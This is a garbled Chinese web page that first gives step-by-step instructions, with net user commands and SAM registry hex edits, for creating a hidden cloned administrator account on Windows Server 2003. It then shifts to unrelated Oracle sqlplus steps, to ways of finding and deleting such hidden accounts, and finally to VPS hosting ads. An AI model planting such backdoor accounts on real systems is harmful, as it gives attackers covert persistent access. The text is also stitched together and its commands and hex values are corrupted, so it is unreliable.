w i n2003 008下建立隐藏系统用户与查看及删除方法wndows系统很好用使用的人很多很多但也超容易中毒下面我来给大家讲win2003/20 下建立隐藏系统用户与查看及删除方法希望对大家所有帮助。 建立隐藏系统用户
先做准备工作,新建一个用户名为sxitn 加上$符号使用命令ne user将查看不到用户 ,密码为23:
t u er s t 123456 /add
然后把sxitn$加入管理组net loclgroup administ ato sxit /ad
然后开始—t&g 运行输入reget3 。 exe找到HKY_LOCAL_AHIE下的AM项下的SAM点击右键-权限,在安全选项卡中添加用户组dmini t aor或者当前用户,允许完全控制应用确定后关闭。
开始->运行输入 gei t打注册表。找到HEY_LCALHINE—SAM-SAM—omins-liases—Use
s—aes—sitn 记住右边的值的类型—>×3ef,然后导出,命名为xit .re 在Use s项中找到3f项也同样导出,命名为3e .r 1 f4 admnis ratr默认
的项)项也导出,命名为1f4。 reg.
用记事本打开1f4。 g,复制:
F"e:02 0 0 ,00,0,0,00,00,d 6,92 e05,df c7 1 00,00,00,0 00 0,0,/
00 0 1c, 8 94,2,c7,1 0,0,00 0,00
00 00,0 ,51 1 cb,08,f 01 /f4,01 0 00 01 0,0 00 0,2,00,00 00,0,0000,1,0 c 00,01 00 0 00 00 /
00,0 00 0 00,
用记事本打开3f。 reg把刚才复制的粘贴到相应的位置。用记事本打开sxit .re复制:
HKEYLOCAL_MACHNSMSAMDomains/ccoun /UsrsNames/x n
@=hex(3e :
粘贴到3ef。 re最后的位置。最后3ef。 r 为
Wi s egis y Edi orersio 5.0
HKOCA_MAIE/S/AM/omains/Account/Users/00003EF]
"F” hex:02 0,01 00,0,0 0,0 0,00 00 0 00,00,0,0 00 00,00 00,0,0 00 /
00,0,97 d 19,1 ,df c7 01 0 00 00,00 00 00
00 00,0 00,0, ,00,00 0,0,/ef ,00 00 01 02 00 00,10,00 00, ,00,
0 00 00 00 00,00 01,0,00 00 00
00 9 ,7c,4e,2e 20 7
”V” =hex 00 00 00,0 b 0 0 00,02 001 00 bc 0,00 00,0c 0, , ,0 00 00 /
0,c 00 00, ,00,00 0 0,0 00 0 0,8,00 00,00,0,00,00,00,00 00,0,00 /c 00 00,00, ,0,00,00 00 0 0 00 c8 0
0 00,00 00 00,0,00,0 0 0, /
00,00 0 0,0 00,0 0,00 00 00 c8 00,00,0,0,0 0 00,00,00 00 0 c8,00 /
0,00 0,00 00,0 00 00 00 00 c, ,0,000 00,00,0,00 0,0,00,c8,00,00,/
00 00 00 0,0 0 00,0 00, ,0,0,00 000,0,0,00 ,00 0 c8,00 00 0,/
0800000001, ,000 d0,000000 14 0,00,00,00, 00,0 e4,00 00 0 4,
00 0,00 00,0,00 0 f,0 00, ,0 00,0
00 00,00 0,00,fc,0,0 0 04,00 /
00,00 00,0 00,0 ,00,14 0,9c,0,00 ,a
00 00 00 14 0 00 00 4,00,0 /
00 02 0,0 00 02,00,00 00 02 c0,14,00 44 005 01,0 ,01 00 00 0,0 00,01,/
0,00,0 0,02 c0,14,00 ff,0 0 ,0,01 01 00,00, ,00, 05 07 00,00 00 02,/
0,58 00 03,00,00,0 00,00,2 00,44 0,02 00,0 ,050,00 0,00 0,05 15 0,/
0,00,5 10 a,37 d9 e9,d7,09 8b 28 ,3 00,00,00 0 ,0,ff,0,0f /
00 01 2,00 0 0 00 00 05 20,00 00 00,2
02 0 00 00,00 1 00,5b 3 02,00 /
01 01,0,00,0 0 ,0 ,0,00 00 00 1, 00,00,0 00 00,05 0 0 0 00 20,
02 00 00 01,02,00 00 00,00 0,0 ,20,00 00 00,20,02,0 ,73 00,7,00,69,00 /
7,00 6e 0 ,02 00, 7 0,00 0 ,00,01 0 c5,3d 4 2 b, 6f /
1,57 d,4c c,e 20 76,3,1,00 1, 47ad, 5,3f ac 4a,a1 f6,d c 9,/bc,1e 8 15,01,00,0 0 01,00,1,00
HKEY_LCL_AHINE/SAMSAMDmain/Account/U ers/Namesxitn]
=hex(3f)
然后保存。删除用户sxitn$:net use s tn$/delet
之后运行3ef.reg导入注册表!打开regedt32.exe把SM安全选项卡中的 min straor删除然后应用.
这样隐藏用户就建立好了。
怎样查看账号创建时间
1、在你安装的时候有一个设置密码,那个密码是你的数据库管理员的密码一定要记住。
2、等数据库安装好之后启动oracle数据库服务后,用下面的命令就可以进入sqlp s在cd中输入qllus sys/密码s sysdba
3、进入数据库后用下面的命令建用户c et sr user;
rnt esur ,connect t u r_name;
4、现在sqlpus就可以进入了,在cmd中输入sqpl u ernm/password查看WIN203服务器下是否加入了隐藏账户
修改注册表型隐藏账户
由于使用这种方法隐藏的账户是不会在“命令提示符"和“计算机管理"中看到的,因此可以到注册表中删除隐藏账户.来到“HKE_LCA_MAHNEAMAMDoaincountU ersames”把这里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可.
使用reged 打开注册表编辑器
找到HKY_LOL_MHIN——SA——M]-—[Dmains——[ccunt]——Users],这里下
面的数字和字母组合的子键是你计算机中所有用户帐户的SAM项.
子分支ames下是用户名,每个对应上面的SA项。查找隐藏的帐户就比较两个用户名的SAM值完全一样的就说明其中一个是克隆帐户。你可以在这里删除其用户名。一般推荐分别导出用户名项和对应的S AM然后找一个关键字分析比较。具体比较的方法多种多样自己看了。
目前有种系统级后门可以在有管理员帐户登入的时候自动删除这里的克隆帐户值等你退出了又自动恢复。遇到这种的情况这里是查不出来的。一般这种后门都是高手搞的,免杀。
遇到这种情况建议找专业安全人员处理。
另外本地安全策略——本地策略-—安全选项中可以查看默认管理员和贵宾帐户这里可以查出默认的ue t是否被克隆了如果这个帐户被克隆这里会显示出真正的克隆后的用户名。
计算机管理中显示的依然是正常的用户,所以查那里是没什么意义的。另一种解决办法开始--运行cmd下
运行。 。 .。 。 net al oup amin s raors
看看那加了的就是隐藏的账户了1、右键单击“我的电脑”
→“管理"→“计算机管理"→“本地用户和组”→“用户”→看看有没有陌生用户
2、→看看有没有陌生用户
隐藏账户在上述中看不到的
3、 “开始"→“运行"→“cmd”→“ egedi ”→找到注册表分支
“HKEYLOCAL_MCHIESAM/S/Domais
Acunt/sers/Nmes”→看看有没有克隆用户无法看到名称的隐藏账户
如果黑客制作了一个修改注册表型隐藏账户在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的甚至无法知道黑客建 立的隐藏账户名称.不过世事没有绝对,我们可以借助“组策略”的帮助让黑客无法通过隐藏账户登陆。点击“开始”→“运行”输入 “pdit.msc"运行“组策略” ,依次展开“计算机配置"→“Windo w设置”→“安全设置”→“本地策略”→“审核策略” ,双击右边的“审核策略更改”在弹出的设置窗口中勾选“成功”然后点“确定"。对“审核登陆事件” 和“审
木木云怎么样?木木云品牌成立于18年,此为贵州木木云科技有限公司旗下新运营高端的服务器的平台,目前已上线美国中部大盘鸡,母鸡采用E5-267X系列,硬盘全部组成阵列。目前,木木云美国vps进行了优惠促销,1核1G/500M带宽/1T硬盘/4T流量,仅35元/月。点击进入:木木云官方网站地址木木云优惠码:提供了一个您专用的优惠码: yuntue目前我们有如下产品套餐:DV型 1H 1G 500M带宽...
Sharktech(鲨鱼服务器商)我们还是比较懂的,有提供独立服务器和高防服务器,而且性价比都还算是不错,而且我们看到有一些主机商的服务器也是走这个商家渠道分销的。这不看到鲨鱼服务器商家洛杉矶独立服务器纷纷促销,不限制流量的独立服务器起步99美元,这个还未曾有过。第一、鲨鱼机房服务器方案洛杉矶机房,默认1Gbps带宽,不限流量,自带5个IPv4,免费60Gbps / 48Mpps DDoS防御。C...
racknerd怎么样?racknerd美国便宜vps又开启促销模式了,机房优秀,有洛杉矶DC-02、纽约、芝加哥机房可选,最低配置4TB月流量套餐16.55美元/年,此外商家之前推出的最便宜的9.49美元/年套餐也补货上架,同时RackNerd美国AMD VPS套餐最低才14.18美元/年,是全网最便宜的AMD VPS套餐!RackNerd主要经营美国圣何塞、洛杉矶、达拉斯、芝加哥、亚特兰大、新...